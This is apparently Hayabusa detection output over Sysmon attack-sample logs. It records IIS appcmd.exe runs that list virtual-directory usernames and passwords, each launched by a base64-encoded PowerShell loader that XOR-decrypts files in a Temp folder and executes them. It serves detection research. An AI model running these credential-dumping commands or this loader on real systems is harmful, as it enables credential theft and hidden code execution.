""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaAB